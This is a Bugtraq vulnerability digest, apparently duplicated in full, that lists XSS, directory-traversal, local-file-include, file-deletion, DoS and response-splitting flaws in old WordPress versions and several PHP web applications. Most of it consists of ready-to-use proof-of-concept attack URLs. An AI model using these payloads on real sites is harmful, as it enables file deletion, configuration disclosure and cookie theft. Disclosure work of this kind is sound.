Dear bugtraq,
Below is a digest of vulnerabilities published by
http://securityvulns.com/ and believed to be previously unpublished in
English. All vulnerabilities were reported by MustLive
( http://websecurity.com.ua/).
1. AwesomeTemplateEngine Crossite scripting
Multiple crossite scripting (require register_globvals):
http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(d /
ocument.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.co /
okie)%3C/script%3E http://site/templates/example_template.php?data[table] [1][item]=%3C /
script%3Ealert(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[table] [1][url]=%22%3E%3Cscript%3Ealert /
(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument784.html
Additional details (in Ukrainian): http://websecurity.com.ua/1694/
2. Wordpress multiple security vulnerabilities:
2.1 information disclosure (WordPress 2.2/2.3)
Invalid request disclosures database structure and local paths:
http://site/?feed=rss2&p=1
Original article (in Russian): http://securityvulns.ru/Sdocument663.html
Additional details (in Ukrainian): http://websecurity.com.ua/1634/
2.2 crossite scripting (WordPress <= 2.0.9)
http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document. /
cookie))%22 http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression /
(alert(document.cookie))%22
Original article (in Russian): http://securityvulns.ru/Sdocument714.html
Additional details (in Ukrainian): http://websecurity.com.ua/1658/
2.3 Directory traversal, Arbitrary file deletion, Denial of Service
and Cross-Site Scripting via wp-db-backup.php
Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
Arbitrary file deletion and DoS (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../index.php
XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument755.html
Additional details (in Ukrainian): http://websecurity.com.ua/1676/
2.4 Local file include, Directory traversal and Full path disclosure
(WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)
Full path disclosure:
http://site/wp-admin/admin.php?import=/../../wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=
Local file include and Directory traversal:
http://site/wp-admin/admin.php?import=/../../file
http://site/wp-admin/themes.php?page=/../../file.php
http://site/wp-admin/themes.php?page=/../../.htaccess
http://site/wp-admin/edit.php?page=/../../file.php
http://site/wp-admin/edit.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../file.php
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/templates.php?page=/../../file.php
http://sites/wp-admin/templates.php?page=/../../.htaccess
http://site/wp-admin/edit-pages.php?page=/../../.htaccess
http://site/wp-admin/categories.php?page=/../../.htaccess
http://site/wp-admin/edit-comments.php?page=/../../.htaccess
http://site/wp-admin/moderation.php?page=/../../.htaccess
http://site/wp-admin/post.php?page=/../../.htaccess
http://site/wp-admin/page-new.php?page=/../../.htaccess
http://site/wp-admin/index.php?page=/../../file.php
http://site/wp-admin/index.php?page=/../../.htaccess
http://site/wp-admin/link-manager.php?page=/../../.htaccess
http://site/wp-admin/link-add.php?page=/../../.htaccess
http://site/wp-admin/link-categories.php?page=/../../.htaccess
http://site/wp-admin/link-import.php?page=/../../.htaccess
http://site/wp-admin/theme-editor.php?page=/../../.htaccess
http://site/wp-admin/plugin-editor.php?page=/../../.htaccess
http://site/wp-admin/profile.php?page=/../../.htaccess
http://site/wp-admin/users.php?page=/../../.htaccess
http://site/wp-admin/options-general.php?page=/../../.htaccess
http://site/wp-admin/options-writing.php?page=/../../.htaccess
http://site/wp-admin/options-reading.php?page=/../../.htaccess
http://site/wp-admin/options-discussion.php?page=/../../.htaccess
http://site/wp-admin/options-permalink.php?page=/../../.htaccess
http://site/wp-admin/options-misc.php?page=/../../.htaccess
http://site/wp-admin/import.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/bookmarklet.php?page=/../../.htaccess
http://site/wp-admin/cat-js.php?page=/../../.htaccess
http://site/wp-admin/inline-uploading.php?page=/../../.htaccess
http://site/wp-admin/options.php?page=/../../.htaccess
http://site/wp-admin/profile-update.php?page=/../../.htaccess
http://site/wp-admin/sidebar.php?page=/../../.htaccess
http://site/wp-admin/user-edit.php?page=/../../.htaccess
Arbitrary file edit:
http://site/wp-admin/templates.php?file=/../../file
Attacks with backslash are possible in Windows version.
Original article (in Russian):
http://securityvulns.ru/Sdocument762.html
http://securityvulns.ru/Sdocument768.html
http://securityvulns.ru/Sdocument773.html
http://securityvulns.ru/Sdocument772.html
Additional detail (in Ukrainian):
http://websecurity.com.ua/1679/
http://websecurity.com.ua/1683/
http://websecurity.com.ua/1686/
http://websecurity.com.ua/1687/
3. Crossite scripting and Denial of Service in PRO-Search <= 0.17
XSS:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Denial of Service:
http://site/?show_page=20000&time=0
Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/
4. Persistant crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)
POST request to
http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php
with different form fields.
Exploits:
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html
Original article (in Russian):
http://securityvulns.ru/Sdocument667.html
http://securityvulns.ru/Sdocument546.html
Additional details (in Ukrainian):
http://websecurity.com.ua/1641/
http://websecurity.com.ua/1600/
5. RotaBanner Local <= 3 crossite scripting
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /
Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/
6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting
http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie) /
%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/
-=-=-=-
There are also few vulnerabilities published in English as a part of
the Month of Bugs in CAPTCHA:
Cryptographp <= 1.2 WordPress plugin multiple persistant crossite
scriptings
Original article: http://websecurity.com.ua/1596/
XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/
XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/
--
http://securityvulns.com/
//_//
{ , . } |/
+--oQQo->{ ^ }<-----+ /
> ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
Below is a digest of vulnerabilities published by
http://securityvulns.com/ and believed to be previously unpublished in
English. All vulnerabilities were reported by MustLive
( http://websecurity.com.ua/).
1. AwesomeTemplateEngine Crossite scripting
Multiple crossite scripting (require register_globvals):
http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(d /
ocument.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.co /
okie)%3C/script%3E http://site/templates/example_template.php?data[table] [1][item]=%3C /
script%3Ealert(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[table] [1][url]=%22%3E%3Cscript%3Ealert /
(document.cookie)%3C/script%3E /
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument784.html
Additional details (in Ukrainian): http://websecurity.com.ua/1694/
2. Wordpress multiple security vulnerabilities:
2.1 information disclosure (WordPress 2.2/2.3)
Invalid request disclosures database structure and local paths:
http://site/?feed=rss2&p=1
Original article (in Russian): http://securityvulns.ru/Sdocument663.html
Additional details (in Ukrainian): http://websecurity.com.ua/1634/
2.2 crossite scripting (WordPress <= 2.0.9)
http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document. /
cookie))%22 http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression /
(alert(document.cookie))%22
Original article (in Russian): http://securityvulns.ru/Sdocument714.html
Additional details (in Ukrainian): http://websecurity.com.ua/1658/
2.3 Directory traversal, Arbitrary file deletion, Denial of Service
and Cross-Site Scripting via wp-db-backup.php
Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
Arbitrary file deletion and DoS (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../index.php
XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document. /
cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument755.html
Additional details (in Ukrainian): http://websecurity.com.ua/1676/
2.4 Local file include, Directory traversal and Full path disclosure
(WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)
Full path disclosure:
http://site/wp-admin/admin.php?import=/../../wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=
Local file include and Directory traversal:
http://site/wp-admin/admin.php?import=/../../file
http://site/wp-admin/themes.php?page=/../../file.php
http://site/wp-admin/themes.php?page=/../../.htaccess
http://site/wp-admin/edit.php?page=/../../file.php
http://site/wp-admin/edit.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../file.php
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/templates.php?page=/../../file.php
http://sites/wp-admin/templates.php?page=/../../.htaccess
http://site/wp-admin/edit-pages.php?page=/../../.htaccess
http://site/wp-admin/categories.php?page=/../../.htaccess
http://site/wp-admin/edit-comments.php?page=/../../.htaccess
http://site/wp-admin/moderation.php?page=/../../.htaccess
http://site/wp-admin/post.php?page=/../../.htaccess
http://site/wp-admin/page-new.php?page=/../../.htaccess
http://site/wp-admin/index.php?page=/../../file.php
http://site/wp-admin/index.php?page=/../../.htaccess
http://site/wp-admin/link-manager.php?page=/../../.htaccess
http://site/wp-admin/link-add.php?page=/../../.htaccess
http://site/wp-admin/link-categories.php?page=/../../.htaccess
http://site/wp-admin/link-import.php?page=/../../.htaccess
http://site/wp-admin/theme-editor.php?page=/../../.htaccess
http://site/wp-admin/plugin-editor.php?page=/../../.htaccess
http://site/wp-admin/profile.php?page=/../../.htaccess
http://site/wp-admin/users.php?page=/../../.htaccess
http://site/wp-admin/options-general.php?page=/../../.htaccess
http://site/wp-admin/options-writing.php?page=/../../.htaccess
http://site/wp-admin/options-reading.php?page=/../../.htaccess
http://site/wp-admin/options-discussion.php?page=/../../.htaccess
http://site/wp-admin/options-permalink.php?page=/../../.htaccess
http://site/wp-admin/options-misc.php?page=/../../.htaccess
http://site/wp-admin/import.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/bookmarklet.php?page=/../../.htaccess
http://site/wp-admin/cat-js.php?page=/../../.htaccess
http://site/wp-admin/inline-uploading.php?page=/../../.htaccess
http://site/wp-admin/options.php?page=/../../.htaccess
http://site/wp-admin/profile-update.php?page=/../../.htaccess
http://site/wp-admin/sidebar.php?page=/../../.htaccess
http://site/wp-admin/user-edit.php?page=/../../.htaccess
Arbitrary file edit:
http://site/wp-admin/templates.php?file=/../../file
Attacks with backslash are possible in Windows version.
Original article (in Russian):
http://securityvulns.ru/Sdocument762.html
http://securityvulns.ru/Sdocument768.html
http://securityvulns.ru/Sdocument773.html
http://securityvulns.ru/Sdocument772.html
Additional detail (in Ukrainian):
http://websecurity.com.ua/1679/
http://websecurity.com.ua/1683/
http://websecurity.com.ua/1686/
http://websecurity.com.ua/1687/
3. Crossite scripting and Denial of Service in PRO-Search <= 0.17
XSS:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Denial of Service:
http://site/?show_page=20000&time=0
Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/
4. Persistant crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)
POST request to
http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php
with different form fields.
Exploits:
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html
Original article (in Russian):
http://securityvulns.ru/Sdocument667.html
http://securityvulns.ru/Sdocument546.html
Additional details (in Ukrainian):
http://websecurity.com.ua/1641/
http://websecurity.com.ua/1600/
5. RotaBanner Local <= 3 crossite scripting
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /
Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/
6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting
http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie) /
%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/
-=-=-=-
There are also few vulnerabilities published in English as a part of
the Month of Bugs in CAPTCHA:
Cryptographp <= 1.2 WordPress plugin multiple persistant crossite
scriptings
Original article: http://websecurity.com.ua/1596/
XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/
XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/
--
http://securityvulns.com/
//_//
{ , . } |/
+--oQQo->{ ^ }<-----+ /
> ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/